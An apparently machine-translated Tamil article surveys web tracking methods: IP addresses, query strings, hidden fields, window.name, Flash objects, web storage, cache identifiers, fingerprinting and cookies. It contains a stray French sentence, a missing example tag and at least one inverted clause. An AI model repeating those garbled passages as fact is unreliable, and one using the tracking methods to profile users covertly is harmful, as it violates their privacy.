பக்கத்தை அழைக்கும் கணினியின் ஐபி முகவரி மூலம் பயனர்களைக் கண்காணிக்க முடியும். உலகளாவிய வலை அறிமுகப்படுத்தப்பட்டதிலிருந்து இந்த நுட்பம் உள்ளது, ஏனெனில் பக்கங்கள் பதிவிறக்கம் செய்யப்படுவதால், உலாவி அல்லது ப்ராக்ஸியில் இயங்கும் கணினியின் IP முகவரியை சேவையகம் கோருகிறது, எதுவும் பயன்படுத்தப்படவில்லை என்றால். குக்கீகள் பயன்பாட்டில் இருந்தாலும் இல்லாவிட்டாலும் இந்த தகவலை சர்வர் கண்காணிக்க முடியும். இருப்பினும், இந்த முகவரிகள் பொதுவாக குக்கீகளைக் காட்டிலும் பயனரை அடையாளம் காண்பதில் குறைவான நம்பகத்தன்மை கொண்டவை, ஏனெனில் கணினிகள் மற்றும் ப்ராக்ஸிகள் பல பயனர்களால் பகிரப்படலாம், மேலும் ஒரே கணினி ஒவ்வொரு பணி அமர்விலும் வெவ்வேறு IP முகவரியைப் பெறலாம் (அதாவது, தொலைபேசி இணைப்புகளுக்கான வழக்குகள் போன்றவை) .

IP முகவரிகள் மூலம் கண்காணிப்பு சில சூழ்நிலைகளில் நம்பகமானதாக இருக்கும், அதாவது ஒரே ஐபி முகவரியை நீண்ட நேரம் பராமரிக்கும் பிராட்பேண்ட் இணைப்புகள், மின்சாரம் இயக்கத்தில் இருக்கும் வரை.

டோர் போன்ற சில அமைப்புகள் இணையத்தின் பெயர் தெரியாத தன்மையை பராமரிக்கவும், ஐபி முகவரி மூலம் கண்காணிப்பதை சாத்தியமற்றதாக அல்லது நடைமுறைக்கு மாறானதாகவும் மாற்றும் வகையில் வடிவமைக்கப்பட்டுள்ளது.

URL ஐ

URL களில் தகவலை உட்பொதிப்பதை அடிப்படையாகக் கொண்டது மிகவும் துல்லியமான நுட்பம். URL இன் வினவல் சரம் பகுதி இந்த நோக்கத்திற்காக பொதுவாகப் பயன்படுத்தப்படும் ஒரு நுட்பமாகும், ஆனால் மற்ற பகுதிகளையும் பயன்படுத்தலாம். குக்கீகள் இயக்கப்படவில்லை என்றால் ஜாவா சர்வர்லெட் மற்றும் PHP அமர்வு வழிமுறைகள் இரண்டும் இந்த முறையைப் பயன்படுத்துகின்றன.

இந்த முறையானது இணைய சேவையகம் இணையப் பக்கத்தின் இணைப்புகளுக்கு சரம் கோரிக்கைகளை இணைப்பதை உள்ளடக்குகிறது, அது உலாவிக்கு அனுப்பப்படும் போது அதைக் கொண்டு செல்லும். பயனர் இணைப்பைப் பின்தொடரும் போது, ​​உலாவி இணைக்கப்பட்ட வினவல் சரத்தை சேவையகத்திற்குத் திருப்பித் தரும்.

இந்த நோக்கத்திற்காகப் பயன்படுத்தப்படும் வினவல் சரங்களும் குக்கீகளும் மிகவும் ஒத்தவை, இவை இரண்டும் சர்வரால் தன்னிச்சையாகத் தேர்ந்தெடுக்கப்பட்ட தகவல் மற்றும் உலாவியால் திருப்பி அனுப்பப்படும். இருப்பினும், சில வேறுபாடுகள் உள்ளன: வினவல் சரம் கொண்ட URL மீண்டும் பயன்படுத்தப்படும் போது, ​​அதே தகவல் சேவையகத்திற்கு அனுப்பப்படும். எடுத்துக்காட்டாக, ஒரு பயனரின் விருப்பத்தேர்வுகள் ஒரு URL இன் வினவல் சரத்தில் குறியாக்கம் செய்யப்பட்டு, அந்த URL ஐ மின்னஞ்சல் மூலம் மற்றொரு பயனருக்கு பயனர் அனுப்பினால், அந்தப் பயனரும் அந்த விருப்பங்களைப் பயன்படுத்த முடியும்.

மறுபுறம், ஒரு பயனர் ஒரே பக்கத்தை இரண்டு முறை அணுகும்போது, ​​ஒரே வினவல் சரம் இரண்டு முறையும் பயன்படுத்தப்படும் என்பதற்கு எந்த உத்தரவாதமும் இல்லை. எடுத்துக்காட்டாக, ஒரு பயனர் உள் தளப் பக்கத்திலிருந்து ஒரு பக்கத்திற்கு முதல் முறையாக வந்து, இரண்டாவது முறை வெளிப்புறப் பக்கத்திலிருந்து அதே பக்கத்தில் இறங்கினால், தளப் பக்கத்துடன் தொடர்புடைய வினவல் சரம் பொதுவாக வேறுபட்டது, அதே சமயம் குக்கீகள் ஒரே மாதிரியாக இருக்கும். .

வினவல் சரங்களின் பிற குறைபாடுகள் பாதுகாப்புடன் தொடர்புடையவை: வினவல் சரங்களில் ஒரு அமர்வை அடையாளம் காணும் தரவை வைத்திருப்பது அமர்வு நிர்ணய தாக்குதல்கள், அடையாளங்காட்டி குறிப்பு தாக்குதல்கள் மற்றும் பிற சுரண்டல்களை செயல்படுத்துகிறது அல்லது எளிதாக்குகிறது. அமர்வு ஐடிகளை HTTP குக்கீகளாக அனுப்புவது மிகவும் பாதுகாப்பானது.

மறைக்கப்பட்ட படிவ புலம்

ASP.NET ஆல் பயன்படுத்தப்படும் அமர்வு கண்காணிப்பின் ஒரு வடிவம், மறைக்கப்பட்ட புலங்களுடன் இணைய படிவங்களைப் பயன்படுத்துவதாகும். இந்த நுட்பம், தகவல்களை எடுத்துச் செல்ல URL வினவல் சரங்களைப் பயன்படுத்துவதைப் போலவே உள்ளது மற்றும் அதே நன்மைகள் மற்றும் தீமைகளைக் கொண்டுள்ளது; மற்றும் படிவம் HTTP GET முறையில் செயலாக்கப்பட்டால், புலங்கள் உண்மையில் உலாவியின் URL இன் பகுதியாக மாறும், அது படிவத்தைச் சமர்ப்பிக்கும் போது அதை அனுப்பும். ஆனால் பெரும்பாலான படிவங்கள் HTTP POST மூலம் செயலாக்கப்படுகின்றன, இதன் மூலம் மறைக்கப்பட்ட புலங்கள் உட்பட படிவத் தகவல் கூடுதல் உள்ளீடாக சேர்க்கப்படும், அது URL இன் பகுதியாகவோ அல்லது குக்கீயாகவோ இல்லை.

இந்த அணுகுமுறையானது கண்காணிப்புக் கண்ணோட்டத்தில் இரண்டு நன்மைகளைக் கொண்டுள்ளது: முதலாவதாக, HTML மூலக் குறியீடு மற்றும் POST உள்ளீட்டில் வைக்கப்பட்டுள்ள தகவலை URL ஐ விட கண்காணிப்பது சராசரி பயனரை இந்த கண்காணிப்பைத் தவிர்க்க அனுமதிக்கும்; இரண்டாவதாக, பயனர் URL ஐ நகலெடுக்கும் போது அமர்வு தகவல் நகலெடுக்கப்படாது (பக்கத்தை வட்டில் சேமிக்க அல்லது மின்னஞ்சல் வழியாக அனுப்ப, எடுத்துக்காட்டாக).

window.பெயர்

அனைத்து பொதுவான இணைய உலாவிகளும் DOM இன் window.name பண்புகளைப் பயன்படுத்தி ஜாவாஸ்கிரிப்ட் வழியாக அதிக அளவிலான தரவை (2MB முதல் 32MB வரை) சேமிக்க முடியும். இந்தத் தரவு அமர்வு குக்கீகளுக்குப் பதிலாகப் பயன்படுத்தப்படலாம் மற்றும் டொமைன்களிலும் பயன்படுத்தப்படும். கிளையன்ட் பக்க அமர்வு மாறிகளின் சிக்கலான தொகுப்பைச் சேமிக்க இந்த நுட்பத்தை JSON பொருள்களுடன் இணைக்கலாம்.

எதிர்மறையானது ஒவ்வொரு தனி சாளரம் அல்லது தாவலை ஆரம்பத்தில் ஒரு வெற்று window.name கொண்டிருக்கும்; தாவல்கள் மூலம் உலாவும்போது (பயனரால் திறக்கப்பட்டது) தனித்தனியாக திறக்கப்பட்ட தாவல்களுக்கு சாளர பெயர் இருக்காது. கூடுதலாக window.name ஆனது தனியுரிமைச் சிக்கலை ஏற்படுத்தக்கூடிய வெவ்வேறு தளங்களில் பார்வையாளர்களைக் கண்காணிக்கப் பயன்படுகிறது.

சில விஷயங்களில் இது குக்கீகளை விட பாதுகாப்பானதாக இருக்கலாம், சர்வரின் ஈடுபாடு இல்லாததால், ஸ்னிஃபர் குக்கீகளின் நெட்வொர்க் தாக்குதலுக்கு இது பாதிப்பில்லாததாக ஆக்குகிறது. இருப்பினும், தரவைப் பாதுகாக்க சிறப்பு நடவடிக்கைகள் எடுக்கப்பட்டால், அதே சாளரத்தில் திறக்கப்பட்ட பிற தளங்கள் மூலம் தரவு கிடைக்கும் என்பதால், அது மேலும் தாக்குதல்களுக்கு ஆளாகிறது.

HTTP அங்கீகாரம்

HTTP நெறிமுறையில் அடிப்படை அணுகல் அங்கீகார நெறிமுறைகள் மற்றும் அணுகல் அங்கீகாரம் ஆகியவை அடங்கும், இது பயனர் பெயர் மற்றும் கடவுச்சொல்லை வழங்கியிருந்தால் மட்டுமே இணையப் பக்கத்தை அணுக அனுமதிக்கிறது. ஒரு இணையப் பக்கத்திற்கான அணுகலை வழங்க சர்வர் ஒரு சான்றிதழைக் கோரினால், உலாவி அதைப் பயனரிடமிருந்து கோருகிறது மற்றும் பெற்றவுடன், உலாவி அதைச் சேமித்து அனைத்து அடுத்தடுத்த HTTP கோரிக்கைகளிலும் அனுப்புகிறது. பயனரைக் கண்காணிக்க இந்தத் தகவல் பயன்படுத்தப்படலாம்.

உள்ளூர் பகிரப்பட்ட பொருள்

உலாவியில் அடோப் ஃப்ளாஷ் பிளேயர் செருகுநிரல் இருந்தால், தி உள்ளூர் பகிரப்பட்ட பொருள்கள் குக்கீகளின் அதே நோக்கத்திற்காக பயன்படுத்தப்படலாம். வலை உருவாக்குநர்களுக்கு அவை கவர்ச்சிகரமான தேர்வாக இருக்கலாம், ஏனெனில்:

• உள்ளூர் பகிரப்பட்ட பொருளின் இயல்பு அளவு வரம்பு 100 KB ஆகும்;
• பாதுகாப்புச் சோதனைகள் பயனர் குக்கீ சோதனைகளிலிருந்து தனித்தனியாக இருக்கும் (எனவே குக்கீகள் இல்லாதபோது உள்ளூர் பகிரப்பட்ட பொருட்களை அனுமதிக்கலாம்).

இந்த கடைசி புள்ளி, குக்கீ நிர்வாகக் கொள்கையை அடோப்பின் உள்ளூர் பகிரப்பட்ட பொருட்களிலிருந்து வேறுபடுத்துகிறது கேள்விகளை எழுப்புகிறது அவரது தனியுரிமை அமைப்புகளின் பயனரின் நிர்வாகத்தைப் பற்றி: குக்கீகளின் நிர்வாகம் உள்ளூர் பகிரப்பட்ட பொருட்களின் நிர்வாகத்தில் எந்த தாக்கத்தையும் ஏற்படுத்தாது என்பதை அவர் அறிந்திருக்க வேண்டும், மேலும் நேர்மாறாகவும்.

இந்த அமைப்பின் மற்றொரு விமர்சனம் என்னவென்றால், அடோப் ஃப்ளாஷ் ப்ளேயர் செருகுநிரல் மூலம் மட்டுமே இதைப் பயன்படுத்த முடியும், இது தனியுரிமமானது மற்றும் இணைய தரநிலை அல்ல.

வாடிக்கையாளர் தரப்பு நிலைத்தன்மை

சில இணைய உலாவிகள் ஸ்கிரிப்ட்-அடிப்படையிலான நிலைத்தன்மை பொறிமுறையை ஆதரிக்கின்றன, இது பக்கத்தை பிற்கால பயன்பாட்டிற்காக உள்நாட்டில் சேமிக்க அனுமதிக்கிறது. எடுத்துக்காட்டாக, Internet Explorer, உலாவி வரலாறு, புக்மார்க்குகள், XML இல் சேமிக்கப்பட்ட வடிவத்தில் அல்லது நேரடியாக வட்டில் சேமிக்கப்பட்ட வலைப்பக்கத்தில் நிலையான தகவலை ஆதரிக்கிறது. மைக்ரோசாஃப்ட் இன்டர்நெட் எக்ஸ்ப்ளோரர் 5 க்கு, DHTML நடத்தைகள் மூலம் பயனர்-தரவு முறை உள்ளது.

W3C ஆனது HTML 5 இல் ஒரு புதிய ஜாவாஸ்கிரிப்ட் API ஐ க்ளையன்ட் பக்க தரவு சேமிப்பகத்திற்காக வலை சேமிப்பு என்று அறிமுகப்படுத்தியது மற்றும் குக்கீகளை நிரந்தரமாக மாற்றுவதை நோக்கமாகக் கொண்டது. இது குக்கீகளைப் போலவே உள்ளது, ஆனால் மிகவும் மேம்பட்ட திறன் மற்றும் HTTP கோரிக்கைகளின் தலைப்பில் தகவலைச் சேமிக்காமல் உள்ளது. API ஆனது இரண்டு வகையான இணைய சேமிப்பகத்தை அனுமதிக்கிறது: உள்ளூர் சேமிப்பகம் மற்றும் அமர்வு சேமிப்பகம், நிலையான குக்கீகள் மற்றும் அமர்வு குக்கீகளைப் போன்றது (உலாவி மூடப்படும் போது அமர்வு குக்கீகள் காலாவதியாகும். அமர்வு சேமிப்பு தாவல் மூடப்படும் போது, ​​முறையே காலாவதியாகும். இணைய சேமிப்பகத்தை Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 மற்றும் Opera 10.50 ஆதரிக்கிறது.

வலைப்பக்கங்களில் ஜாவாஸ்கிரிப்ட் நிரல்களைப் பயன்படுத்தி உலாவி தேக்ககத்தை (புதுப்பிப்பதை விட நினைவகத்தில்) ஒரு வித்தியாசமான பொறிமுறையானது பொதுவாக நம்பியுள்ளது. 

எடுத்துக்காட்டாக, ஒரு பக்கத்தில் குறிச்சொல் இருக்கலாம் . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

இந்த கட்டத்தில், நிரல் கேச் நினைவகத்தில் உள்ளது மற்றும் பார்வையிட்ட பக்கம் இரண்டாவது முறையாக மீண்டும் ஏற்றப்படவில்லை. இதன் விளைவாக, நிரல் ஒரு உலகளாவிய மாறியைக் கொண்டிருந்தால் (எடுத்துக்காட்டாக var id = 3243242;), இந்த அடையாளங்காட்டி செல்லுபடியாகும் மற்றும் பக்கம் மீண்டும் ஏற்றப்பட்டதும் அல்லது நிரலை இணைக்கும் பக்கம் ஏற்றப்பட்டதும் பிற ஜாவாஸ்கிரிப்ட் குறியீட்டைப் பயன்படுத்திக் கொள்ளலாம். 

இந்த முறையின் முக்கிய தீமை என்னவென்றால், ஜாவாஸ்கிரிப்ட் உலகளாவிய மாறி நிலையானதாக இருக்க வேண்டும், அதாவது குக்கீயைப் போல அதை மாற்றவோ அல்லது நீக்கவோ முடியாது.

இணைய உலாவி கைரேகை

உலாவி கைரேகை என்பது, அடையாள நோக்கங்களுக்காக உலாவியின் உள்ளமைவு அமைப்புகளைப் பற்றி சேகரிக்கப்பட்ட தகவலாகும். குக்கீகள் முடக்கப்பட்டிருந்தாலும் கூட, இணையப் பயனரை அல்லது சாதனத்தை முழுமையாகவோ அல்லது பகுதியாகவோ அடையாளம் காண இந்தக் கைரேகைகளைப் பயன்படுத்தலாம்.

மனித இணையப் போக்குவரத்தை துல்லியமாக அளவிடுவதற்கும், பல்வேறு வகையான கிளிக் மோசடிகளைக் கண்டறிவதற்கும், இணையதள பார்வையாளர்களின் சேவைகளால் அடிப்படை இணைய உலாவி உள்ளமைவுத் தகவல்கள் நீண்ட காலமாக சேகரிக்கப்பட்டு வருகின்றன. கிளையன்ட் பக்க ஸ்கிரிப்டிங் மொழிகளின் உதவியுடன், மிகவும் துல்லியமான தகவல் சேகரிப்பு ஆகும் இப்போது சாத்தியம்.

இந்தத் தகவலை ஒரு பிட் சரமாக மாற்றுவது சாதனத்தின் கைரேகையை உருவாக்குகிறது. 2010 இல், எலக்ட்ரானிக் ஃபிரான்டியர் ஃபவுண்டேஷன் (EFF) உலாவியின் கைரேகையின் என்ட்ரோபியை குறைந்தபட்சம் அளவிட்டது. 18,1 பிட்கள், மற்றும் கேன்வாஸ் கைரேகையின் முன்னேற்றங்கள் அந்த என்ட்ரோபியில் 5,7 பிட்களைச் சேர்த்தது.

சுருக்கமாக குக்கீகள்

குக்கீகள் என்பது இணைய உலாவியால் இணையதளப் பார்வையாளரின் வன்வட்டில் சேமிக்கப்படும் சிறிய உரைக் கோப்புகளாகும், மேலும் அவை பார்வையாளரைப் பற்றிய தகவலைப் பதிவு செய்ய அல்லது தளத்தின் வழியாக அவர்கள் பயணம் செய்யப் பயன்படுத்தப்படுகின்றன. வெப்மாஸ்டர் ஒரு பார்வையாளரின் பழக்கவழக்கங்களை அடையாளம் கண்டு, ஒவ்வொரு பார்வையாளருக்கும் அவரது தளத்தின் விளக்கக்காட்சியைத் தனிப்பயனாக்கலாம்; குக்கீகள் முகப்புப் பக்கத்தில் எத்தனை கட்டுரைகளைக் காண்பிக்க வேண்டும் என்பதை நினைவில் வைத்துக் கொள்ளவும் அல்லது தனிப்பட்ட தரப்பினருக்கான உள்நுழைவுச் சான்றுகளைத் தக்கவைத்துக் கொள்ளவும் உதவுகிறது: பார்வையாளர் தளத்திற்குத் திரும்பும்போது, ​​அவர் தனது பெயரையும் கடவுச்சொல்லையும் தட்டச்சு செய்ய வேண்டிய அவசியமில்லை. அவை தானாகவே குக்கீயில் படிக்கப்படுவதால், அங்கீகரிக்கப்படும்.

குக்கீக்கு தள வடிவமைப்பாளரால் வரையறுக்கப்பட்ட ஆயுட்காலம் உள்ளது. தளத்தின் அமர்வின் முடிவில் அவை காலாவதியாகலாம், இது உலாவியை மூடுவதற்கு ஒத்திருக்கிறது. குக்கீகள் பார்வையாளர்களுக்கு வாழ்க்கையை எளிதாக்குவதற்கும் மேலும் பொருத்தமான தகவல்களை வழங்குவதற்கும் பரவலாகப் பயன்படுத்தப்படுகின்றன. ஆனால் சிறப்பு நுட்பங்கள் பல தளங்களில் ஒரு பார்வையாளரைப் பின்தொடர்வதை சாத்தியமாக்குகின்றன, இதனால் அவரது பழக்கவழக்கங்கள் பற்றிய விரிவான தகவல்களைச் சேகரித்து குறுக்கு சோதனை செய்யலாம். இந்த முறை குக்கீகளைப் பயன்படுத்துவதற்கு பார்வையாளர்களின் தனியுரிமையை மீறும் ஒரு கண்காணிப்பு நுட்பமாக நற்பெயரைக் கொடுத்துள்ளது, இது துரதிர்ஷ்டவசமாக தொழில்நுட்பமற்ற காரணங்களுக்காக அல்லது பயனர் எதிர்பார்ப்புகளுக்கு மதிப்பளிக்காத பல சந்தர்ப்பங்களில் யதார்த்தத்துடன் ஒத்துப்போகிறது.

இந்த நியாயமான அச்சங்களுக்கு விடையிறுக்கும் வகையில், HTML 5 ஆனது கிளையன்ட் பக்க தரவு சேமிப்பகத்திற்கான புதிய ஜாவாஸ்கிரிப்ட் API ஐ அறிமுகப்படுத்துகிறது, இது மிகவும் பாதுகாப்பானது மற்றும் அதிக திறன் கொண்டது, இது குக்கீகளை மாற்றுவதை நோக்கமாகக் கொண்டுள்ளது.

குக்கீகளின் சேமிப்பு

சில உலாவிகளில், குக்கீயை எளிதில் திருத்த முடியும், நோட்பேட் போன்ற எளிய உரை திருத்தி அதன் மதிப்புகளை கைமுறையாக மாற்ற போதுமானது.

உலாவியைப் பொறுத்து குக்கீகள் வெவ்வேறு வகையில் சேமிக்கப்படுகின்றன:

• Microsoft Internet Explorer ஒவ்வொரு குக்கீயையும் வெவ்வேறு கோப்பில் சேமிக்கிறது;
• Mozilla Firefox, அதன் அனைத்து குக்கீகளையும் ஒரே கோப்பில் சேமிக்கிறது;
• Opera அதன் அனைத்து குக்கீகளையும் ஒரே கோப்பில் சேமித்து அவற்றை குறியாக்குகிறது (மென்பொருள் விருப்பங்களைத் தவிர அவற்றை மாற்றுவது சாத்தியமில்லை);
• ஆப்பிள் சஃபாரி அதன் அனைத்து குக்கீகளையும் ஒரே .plist நீட்டிப்பு கோப்பில் சேமிக்கிறது. நீங்கள் மென்பொருள் விருப்பங்களைச் சென்றாலொழிய, மாற்றம் சாத்தியம் ஆனால் மிகவும் எளிதானது அல்ல.

ஆதரிக்க உலாவிகள் தேவை குறைந்தபட்சம் :

• 300 ஒரே நேரத்தில் குக்கீகள்;
• ஒரு குக்கீக்கு 4 o;
• ஒரு ஹோஸ்ட் அல்லது டொமைனுக்கு 20 குக்கீகள்.